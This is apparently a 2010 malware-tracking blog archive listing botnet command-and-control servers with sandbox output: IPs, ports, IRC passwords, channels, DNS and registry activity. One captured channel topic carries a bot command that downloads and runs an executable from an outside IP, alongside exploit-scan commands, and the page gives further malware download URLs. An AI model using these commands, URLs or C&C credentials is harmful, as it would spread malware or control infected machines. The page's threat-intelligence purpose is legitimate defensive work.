Month: November 2010

98.126.44.98(Botnet hosted with kryptservers.com USA California)

still USA hosting involved in Botnet hosting Remote Host Port Number 208.53.183.219 80 208.53.183.73 80 208.53.183.92 80 98.126.44.98 8100 PASS laorosr ircd here MODE #! -ix MODE #Ma -ix USER SP2-650 * 0 :COMPUTERNAME MODE [N00_USA_XP_9718720] @ -ix MODE #dpi -ix Joins channel: :#! #! :.asc​-S|.http​ http://​208.53.1​83.217/u​se13.exe​|.asc ex​p_all 30​ 5 0 -a-​r -e|.as​c exp_al​l 30

bss-crypt.no-ip.info

Processes CreatedPId Process Name Image Name 0x378 cc.exe C:WINDOWScc.exe Threads CreatedPId Process Name TId Start Start Mem Win32 Start Win32 Start Mem 0x2ac lsass.exe 0x298 0x7c810856 MEM_IMAGE 0x77e76bf0 MEM_IMAGE 0x348 svchost.exe 0xf8 0x7c810856 MEM_IMAGE 0x7c910760 MEM_IMAGE 0x378 cc.exe 0x374 0x7c810867 MEM_IMAGE 0x4973f0 MEM_IMAGE 0x3f4 svchost.exe 0x67c 0x7c810856 MEM_IMAGE 0x77e76bf0 MEM_IMAGE DNS QueriesDNS Query Text bss-crypt.no-ip.info

ms.allnewdots.com(buterfly bot hosted in United States Woodstock Fdcservers.net)

yes again this hoster and again buterfly boter hosted in USA they prob dont know that the buterfly botnet creator was arrested by FBI IP Location: United States Woodstock Fdcservers.net Resolve Host: sys-047.leeware.com IP Address: 208.53.131.135 exe file hosted with fdcservers.net: http://74.63.78.13/bdnu.exe IP Location: United States Woodstock Fdcservers.net Resolve Host: roa.ecuaideas3.net IP Address: 74.63.78.13 Resolved

gutyeaz.com

DNS Lookup Host Name IP Address dell-d3e62f7e26 10.1.6.2 gutyeaz.com 184.106.247.215 kadds.ru 91.211.117.127 rapidshare.com rapidshare.com 195.122.131.4 rs286l34.rapidshare.com rs286l34.rapidshare.com 62.67.1.87 UDP Connections Remote IP Address: 184.106.247.215 Port: 2727 Send Datagram: packet(s) of size 21 Recv Datagram: 3000 packet(s) of size 0 Remote IP Address: 184.106.247.215 Port: 2727 Send Datagram: packet(s) of size 21 Recv Datagram: 3000 packet(s)

limon4ik.com(E-mail worm hosted with http://www.interserver.net/ US hosting)

DNS Lookup Host Name IP Address ssl.aukro.ua 193.23.48.228 ir.kagoshima-u.ac.jp 163.209.180.1 ss1.coressl.jp 202.172.28.253 www.billboxrecords.com.br 200.234.192.141 www.saredrogarias.com.br 74.52.66.226 forum.gryada.org.ua 193.169.188.64 loja.tray.com.br 201.20.35.20 masterkey.com.ua 212.82.216.42 isu2.tup.km.ua 212.111.198.59 www.stone.co.ua 67.15.97.220 www.mlh.co.jp 115.125.150.234 sou wow.merlin.org.ua 91.203.146.30 global-host.com.ua ex2.broadser form.cao.go.jp 203.180.136.89 bunker.org.ua 195.214.214.53 UDP Connections Remote IP Address: 10.1.1.1 Port: 53 Send Datagram: 2 packet(s) of size 37 Recv Datagram: packet(s)

ihax.sytes.net(CableLink109-243.telefonia.InterCable.net Mexico)

ihax.sytes.net: type A, class IN, addr 201.172.109.243 api.ipinfodb.com: type A, class IN, addr 67.212.74.82 Data: GET /v2/​ip_query​_country​.php?key​=86c9c73​4428c123​0cba1356​dcf99dc8​82bc229b​f93fbd64​91db4e87​76d6d9a8​8&ti​mezone=o​ff HTTP/​1.1 Raw: ..’.?…​’..K..E.​.Jag@…​.q..o.C.​JR.R.P..​…8.”P.​…C..GE​T /v2/ip​_query_c​ountry.p​hp?key=8​6c9c7344​28c1230c​ba1356dc​f99dc882​bc229bf9​3fbd6491​db4e8776​d6d9a88&​amp;time​zone=off​ HTTP/1.​1..Host:​ api.ipi​nfodb.co​m..Cache​-Control​: no-cac​he..User​-Agent: ​Mozilla/​5.0 (Win​dows; U;​ Windows​ NT 6.1;​ en-US; ​rv:1.9.1​) Gecko/​20090612​ Firefox​/3.5..Co​nnection​: closed​….

91.203.146.65(Botnet hosted with http://goodnet.com.ua/ Ukraine)

Remote Host Port Number 173.193.205.116 8014 69.163.248.145 80 69.163.250.145 80 69.50.197.244 80 89.238.149.67 80 92.241.184.111 80 91.203.146.65 8878 port changed to 7276 USER duzlurcv duzlurcv duzlurcv :ajpenurz NICK ROIKiQGLO PONG :lols.nope.com MODE ROIKiQGLO +xi JOIN #maxi USERHOST ROIKiQGLO MODE #maxi +smntu Now talking in #maxi Topic On: [ #maxi ] [ =IxgN+TVR/M3693AU+b3Zymnqh7XjJ1xl8jRu0jdcrmWRb9Cr2BZAVxeyjwZ5PinlmrfYQ071m7u5f6tl0MGpVffGThs1UcXWLPEB2izDaRPHN8sxZILY/zc1b9ShwEHRBfKIZHRzdVWFQLUQ74SpuICbyIMK9U9yfLFnFvRV2Q1ry1d9NFrF1qzxS1kgf9/MG+tReUpUCS70eGoaIVQBELe+h1jgUQOlu6bKkas6aD8ro4e/ZSuWsr90pUDny6j8vHGNx99a/dFEw/gHLDmso9qbVB ] Topic By:

64.202.120.41(botnet hosted with hostforweb.com)

another botnet server hosted in US CHICAGO from www.hostforweb.com Remote Host Port Number 204.0.5.42 80 204.0.5.43 80 204.0.5.58 80 208.43.117.134 80 216.178.38.103 80 216.178.38.168 80 63.135.86.30 80 63.135.86.37 80 64.208.138.101 80 66.220.149.25 80 64.202.120.41 1234 PASS xxx ircd here NICK NEW-[USA|00|P|09511] USER XP-8613 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|09511] -ix JOIN #!nn! test PONG 22 MOTD

bbg.moiservice.com

DNS Lookup Host Name IP Address bbg.moiservice.com 74.117.174.82 i3ED6DA76.versanet.de 62.214.218.118 Opened listening TCP connection on port: 55907 Opened listening TCP connection on port: 113 C&C Server: 74.117.174.82:16667 Server Password: Username: laMer Nickname: XP|Ubd2 Channel: #lbl# (Password: lam) Channeltopic: : Registry Changes by all processes Create or Open Changes HKEY_CURRENT_USERSoftwaremIRC “DateUsed” = 1264705554 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionUninstallmIRC “DisplayName” =

gs.unicatz.com

Remote Host Port Number 74.117.174.82 2010 NICK XPUiw3 USER laMer “” “gs.unicatz.com” : You Think i aughty USERHOST XPUiw3 MODE XPUiw3 +i JOIN #tcp# d0s MODE #tcp# PONG :s11.cpe.netcabo.uk * The following ports were open in the system: Port Protocol Process 1052 TCP Winter.pif (%System%dllcacheWinter.pif) 32403 TCP Winter.pif (%System%dllcacheWinter.pif) Registry Modifications * The following Registry